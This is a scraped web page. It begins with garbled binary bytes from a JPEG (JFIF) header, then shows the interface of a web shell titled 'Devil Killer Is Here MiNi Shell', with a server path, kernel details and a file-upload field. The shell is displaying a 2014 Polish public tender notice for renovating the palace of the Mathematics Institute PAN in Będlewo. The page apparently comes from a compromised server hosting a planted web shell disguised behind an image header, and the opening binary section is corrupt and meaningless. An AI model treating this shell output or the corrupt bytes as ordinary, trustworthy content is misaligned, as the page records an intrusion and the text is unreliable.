JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141103/363204-N-2014.html

<p class="kh_header"><b>Warszawa: Roboty remontowe i renowacyjne elewacji i stolarki budynku pałacowego Instytutu Matematycznego PAN 
w Będlewie</b><br>
<b>Numer ogłoszenia: 363204 - 2014; data zamieszczenia: 03.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Matematyczny Polskiej Akademii Nauk , ul. Śniadeckich 8, 00-956 Warszawa, woj. mazowieckie, tel. 0-22 522 81 30, faks 0-22 629 39 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.impan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Naukowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe i renowacyjne elewacji i stolarki budynku pałacowego Instytutu Matematycznego PAN 
w Będlewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty remontowe i renowacyjne elewacji i stolarki budynku pałacowego Instytutu Matematycznego PAN w Będlewie przy ul. Parkowa 1, 62-060 Stęszew k_Poznania (Decyzja udzielenia pozwolenia na wykonanie robót budowlanych nr 2834 14 z dnia 23.06.2014 r.) 
i wg. przyjętego harmonogramu: 

w terminie od 30 listopada 2014r. do 31 marca 2015 r. wykonanie:

Demontażu istniejącej stolarki, 
Produkcji i montażu na budynku nowych zestawów okiennych,
Renowacji  zewnętrznych skrzydeł okiennych i drzwiowych,
Montażu stolarki istniejącej po remoncie konserwatorskim,

Uwaga: ostateczny montaż zewnętrznych skrzydeł okiennych i drzwiowych poddanych renowacji może być wykonany po zakończeniu remontu elewacji

w terminie od 1 kwietnia 2015r. do 30 października 2015 r. na:

Remontu elewacji budynku, 
Wyprowadzeniu przewodów wentylacyjnych ponad połać dachową,
Naprawy (uszczelnienia) istniejącego pokrycia dachu.

Uwaga: w trakcie wykonywania prac należy się liczyć z okresowym brakiem dostępu do niektórych pomieszczeń budynku, w związku z tym kolejność wykonywania prac będzie trzeba uzgodnić z kierownictwem ośrodka.

Opis techniczny w przedmiocie zamówienia
1. Położenie i informacje o obiekcie.
Budynek położony jest na terenie zespołu pałacowo - folwarcznego i  parkowego 
w miejscowości Będlewo w gminie Stęszew w powiecie poznańskim. Zespół obejmuje działki o nr ewidencyjnych : 300, 301, 302/1 i 302/2. 
W skład zespołu, poza zabytkowym parkiem i budynkiem pałacu, wchodzą zabudowania dawnego folwarku przystosowane do obsługi funkcji konferencyjno - rekreacyjnej, oraz nowy budynek konferencyjno - hotelowy. Obecnie budynki użytkowane są przez  Ośrodek Badawczo-Konferencyjny w Będlewie należący do Instytutu Matematycznego PAN, jednego z najlepszych instytutów badawczych w Polsce i jednego z najlepszych w dziedzinie matematyki na świecie, mającego od 2012 r. status Krajowego Naukowego Ośrodka Wiodącego.
W Ośrodku odbywa się rocznie 30-40 konferencji, szkoleń i warsztatów międzynarodowych. 
Pałac z 1866 roku wpisany jest do rejestru zabytków pod nr rej 1493A z dnia 27.11.1973r.

2. Ogólna charakterystyka obiektu
Korpus główny budynku dwukondygnacyjny z poddaszem nieużytkowym całkowicie podpiwniczony. Najwyższa wysokość budynku nad hallem głównym wynosi 12,5m.
 Od południa dobudowana część mieszkalna jednokondygnacyjna. Budynek wieńczą dwie wieże: wyższa ośmioboczna o wysokości ok. 17m i niższa okrągła o wysokości  ok. 11,5 m

Dane liczbowe:
Powierzchnia zabudowy 	         - 683,90m2
powierzchnia całkowita budynku 	- 1822,53m2 
kubatura całkowita budynku 		- 5075,32m3
powierzchnia ogrzewana budynku 		- 1351,60m2 
kubatura ogrzewana budynku 	- 4467,20m3
powierzchnia użytkowa budynku 	                                                - 1237,06 m2

3. Obecna funkcja obiektu

Budynek wchodzi w skład zespołu obiektów Centrum Badawczo - Konferencyjnego Instytutu Matematycznego Polskiej Akademii Nauk i pełni głównie funkcję zaplecza gastronomicznego i reprezentacyjnego
W piwnicy budynku zlokalizowane są  pomieszczenia kuchenne, magazyny środków spożywczych, magazyn środków czystości, magazyn zastaw stołowych, drink bar, zaplecze socjalne pracowników kuchni, kotłownia, oraz obecnie nieużywany duży zespół pomieszczeń higieniczno - sanitarnych z sauną. 
Na parterze budynku zlokalizowane są pomieszczenia reprezentacyjne służące głównie jako sale restauracyjne dla gości ośrodka, a okazjonalnie jako sale balowe.
Przylega do nich pomieszczenie wydawcze kuchni połączone z kuchnią klatką schodową i dźwigiem towarowym. W południowej części budynku zlokalizowana jest biblioteka i kameralna sala konferencyjna a także pomieszczenie mieszkalne pracowników i pomieszczenie magazynowe restauracji.
Piętro budynku w wyniku wtórnych podziałów pomieszczeń ma charakter hotelowy.
Na skutek wadliwie działającego systemu kanalizacji ciśnieniowej jest ono niemal całkowicie wyłączone z użytkowania. Użytkowany jest obecnie tylko jeden pokój hotelowy zlokalizowany na południowym krańcu budynku. Przygotowywany do użytkowania jest sąsiadujący z nim apartament. W wieży południowej funkcjonuje pomieszczenie biurowe.
Poddasze budynku jest nieużytkowane.  
4.  Cel i zakres inwestycji.
W chwili obecnej  Instytut Matematyczny PAN  przygotowuje program kompleksowej termomodernizacji Pałacu.
W związku z planowanym remontem termomodernizacji niezbędny jest remont i wymiana istniejącej stolarki okiennej i drzwiowej w taki sposób aby zapewnić zmniejszenie zapotrzebowania na ciepło dla ogrzania budynku wraz z uszczelnieniem budynku i zmniejszeniem ilości powietrza przypadkowo infiltrującego przez nieszczelności stolarki okiennej i drzwiowej. Planowane prace są nierozerwalnie połączone z ingerencją w strukturę elewacji budynku.
W związku z powyższym przygotowano opracowanie pozwalające na przeprowadzenie remontu zabytkowych elementów elewacji po wykonaniu  powiązanych z elewacją prac remontowych.
Projekt budowlany remontu wszystkich  elewacji przewiduje następujący zakres prac podstawowych:
1.	naprawę tynków,
2.	kolorystykę elewacji i malowanie,
3.	czyszczenie i impregnacja ceglanego cokołu pałacu oraz murków tarasów i podjazdu,
4.	renowację piwnicznych krat okiennych, wymianę siatek zabezpieczających okna piwniczne,
5.	uszczelnienie, oczyszczenie, naprawę rur spustowych i koszy odbierających wodę deszczową, 
6.	 renowację  podokienników i obróbek blacharskich,
7.	wymianę elewacyjnych kratek wentylacyjnych,
8.	remont betonowej posadzki nad zewnętrznym kanałem wentylacyjnym wokół budynku, 
9.	naprawę instalacji odgromowej,
10.	przełożenie i renowację schodów kamiennych na elewacji frontowej.

Do projektu załączony jest plan sytuacyjny. Przewidywane roboty budowlane nie wymagają sporządzenia projektu zagospodarowania działki.

Projekt budowlany remontu i wymiany stolarki przewiduje następujący zakres prac podstawowych:
1. wymiana wszystkich okien piwnicznych pojedynczych i skrzynkowych na okna  
o zwiększonej energoizolacyjności,
 2. remont okien parteru i piętra poprzez:
-  wyremontowanie skrzydeł zewnętrznych,
-  wymianę skrzydeł wewnętrznych na nowe skrzydła o zwiększonej energoizolacyjności,
 3.  remont okien w wieżach poprzez:
-  wyremontowanie skrzydeł zewnętrznych,
-  wymianę skrzydeł wewnętrznych na nowe skrzydła o zwiększonej energoizolacyjności.
4.  wyremontowanie potrójnych zewnętrznych dwuskrzydłowych drzwi wejściowych
5.  odtworzenie brakujących dwuskrzydłowych drzwi wejściowych wewnętrznych według wzoru istniejących drzwi sąsiednich
6.  wyremontowanie drzwi tarasowych oraz drzwi do piwnicy.

Stan zachowania elewacji kwalifikuje ją do jak najszybszego remontu konserwatorskiego. Pozostawienie obiektu bez działań konserwatorskich spowoduje stopniowe i coraz szybsze pogarszanie się stanu technicznego i estetycznego budynku. 
Podczas realizacji kolorystyki elewacji należy wykonać próbki kolorystyczne na ścianie dobrze oświetlonej o powierzchni minimum 1,0 m2 i dokonać wyboru z udziałem nadzoru autorskiego i konserwatorskiego.
Ilekroć wymienione są w opracowaniu materiały konkretnej firmy jest to jedno z możliwych rozwiązań. Wykonawca może użyć materiałów o podobnych właściwościach technicznych innych producentów, jednak nie gorszych jakościowo.
Granitowe elementy schodów należy rozebrać i wykonać naprawę podłoża. Po zdjęciu okładzin i odsłonięciu podłoża widoczny będzie zakres ewentualnych i koniecznych napraw. 
Czynności związane z czyszczeniem i naprawą ceglanych podmurówek ogrodzeń należy przeprowadzić zgodnie z  technologią renowacji powierzchni ceglanych.
Konkretnego wyboru koloru należy dokonywać przy udziale nadzoru autorskiego 
i Konserwatorskiego z uwzględnieniem kolorystyki pierwotnej.

Ilość sztuk okien razem 107

	Wykonawca zobowiązany jest do wykonania dokumentacji powykonawczej Konserwatorskiej i budowlanej, a przed przystąpieniem do robót i w czasie ich trwania do dokonywania wszelkich zgłoszeń, uzgodnień i uzyskiwania koniecznych decyzji dla realizacji zadania od urzędów i władz szczebli administracyjnych w przedmiocie zamówienia na własny koszt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających w wysokości nie przekraczającej 50% wartości zrealizowania zamówienia podstawowego na podstawie art. 67 ust. 1 pkt 5) i 6) ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w kwocie 17.000,00 PLN należy wnieść do dnia upływu terminu składania ofert. Szczegółowe informacje na temat wadium zostaną podane w Specyfikacji Istotnych Warunków Zamówienia, którą otrzymają Wykonawcy zaproszeni do składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Doświadczenie - posiadają doświadczenie zawodowe, wyrażające się wykonaniem z należytą starannością, w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, pięciu robót budowlanych polegających na wykonaniu remontu i renowacji elewacji i stolarki w budynku o charakterze użyteczności publicznej*, którego kubatura jest nie mniejsza niż 5000 m3 wartości nie mniejszej niż 600.000 zł brutto każdy. * przez obiekt użyteczności publicznej rozumie się: budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. W sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 nr 75 poz. 690)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Kadra - dysponują osobami (co najmniej jedną osobą dla każdej specjalności), które zgodnie z wymogami art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2010, Nr 243, poz. 1623 ze zm.) mogą pełnić samodzielne funkcje techniczne w budownictwie obejmujące kierowanie robotami budowlanymi obiektów będących wpisanych do Rejestru prowadzonego przez Konserwatora zabytków w zakresie przedmiotu zamówienia tj. posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach: - konstrukcyjno - budowlanej; oraz posiada - co najmniej 20 osób zatrudnionych w charakterze pracowników fizycznych, celem zapewnienia prowadzenia robót w systemie dwuzmianowym oraz w soboty i dni wolne od pracy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Sytuacja ekonomiczna i finansowa - przedłożenie informacji z Banku lub spółdzielczej kasy oszczędnościowo-kredytowej że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiada środki finansowe w wysokości min. 500.000,00 PLN i zdolność kredytową w wysokości min. 500.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawcy zaproszeni do składnia ofert zobowiązani będą przedłożyć: a) wykaz oferowanych równoważnych (w stosunku do opisanych znakiem towarowym i/lub nazwą producenta w dokumentacji projektowej i przedmiarze robót) wyrobów budowlanych, urządzeń i elementów wyposażenia, określający w szczególności: numer pozycji przedmiarowej, nazwę wyrobu, urządzenia lub elementu wyposażenia podstawowego, nazwę, typ i producenta oferowanego zamiennika, opracowany według wzoru który będzie stanowił załącznik nr 2 do SIWZ - jeżeli Wykonawca będzie przewidywał zastosowanie równoważnych wyrobów budowlanych, urządzeń lub elementów wyposażenia. b) aprobatę techniczną, certyfikat, opis techniczny, kartę katalogową, lub inny dokument dotyczący oferowanego zamiennika, określający jego podstawowe parametry techniczno-jakościowe, potwierdzający, iż oferowany równoważny wyrób budowlany, urządzenie lub element wyposażenia jest co najmniej odpowiednikiem wyrobu, urządzenia lub elementu wyposażenia określonego w dokumentacji projektowej- jeżeli Wykonawca przewiduje zastosowanie równoważnych wyrobów budowlanych, urządzeń lub elementów wyposażenia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków; Zobowiązanie należy przedłożyć w oryginale lub notarialnie potwierdzonej kopii. 
b) W przypadku składania wniosku /oferty/ przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do wniosku /oferty/ musi być dołączone dla podmiotu wiodącego -lidera - pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być podpisane przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia - złożone w formie oryginału lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>W przypadku, gdy więcej niż 5 Wykonawców spełni warunki udziału w postępowaniu zawarte w ogłoszeniu, Zamawiający zastosuje dodatkową kwalifikację w postaci przyznania każdemu Wykonawcy po 1 pkt za każdą dodatkowo wykonaną, ponad minimum kwalifikacyjne robotę budowlaną, zrealizowaną w okresie ostatnich 5 lat polegającą na wykonaniu remontu i renowacji elewacji i stolarki w budynku o charakterze użyteczności publicznej*, którego kubatura jest nie mniejsza niż 5000 m3 wartości nie mniejszej niż 600.000 zł brutto każdy. W przypadku uzyskania równej liczby pkt o kolejności wniosków decydować będzie dodatkowo największa łączna wartość brutto wszystkich wykazanych robót polegających na wykonaniu modernizacji i remontu dachu obiektu użyteczności publicznej o wartości nie mniejszej niż 600.000 zł brutto. Zamawiający zaprosi do złożenia oferty 5 Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz otrzymali w kolejności najwyższą ilość punktów przyznawanych wg wyżej wymienionych zasad. W przypadku jeżeli liczba Wykonawców, którzy spełniają warunki udziału postępowaniu, jest mniejsza niż określona w ogłoszeniu (5) Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio wartości zamówienia lub terminu realizacji zamówienia w przypadku zaistnienia następujących okoliczności: 1) W zakresie terminów (możliwość przerwania robót a więc i realizacji umowy): a) na czas, kiedy będzie to konieczne ze względu na niesprzyjające warunki atmosferyczne (technologiczna niemożność), b) w następstwie postępowań administracyjnych, w tym wydłużonych (wykraczających poza terminy określone w KPA) procedur administracyjnych oraz innych terminów spraw urzędowych, mających wpływ na terminy realizacji zamówienia - udokumentowanych, c) możliwość wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego, d) w przypadku wystąpienia zmian spowodowanych warunkami geologicznymi, hydrologicznymi, archeologicznymi, wodnymi itd. w szczególności w sytuacji wystąpienia warunków odmiennych od przyjętych w otrzymanej dokumentacji, e) w przypadku konieczności usunięcia błędów w dokumentacji, wprowadzenia zmian w dokumentacji. 2) W zakresie wartości zamówienia: a) ograniczenia środków budżetowych przeznaczonych na realizację zamówienia; b) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem naruszającym dyscyplinę środków publicznych, c) w przypadku konieczności usunięcia błędów w dokumentacji, wprowadzenia zmian w dokumentacji. 
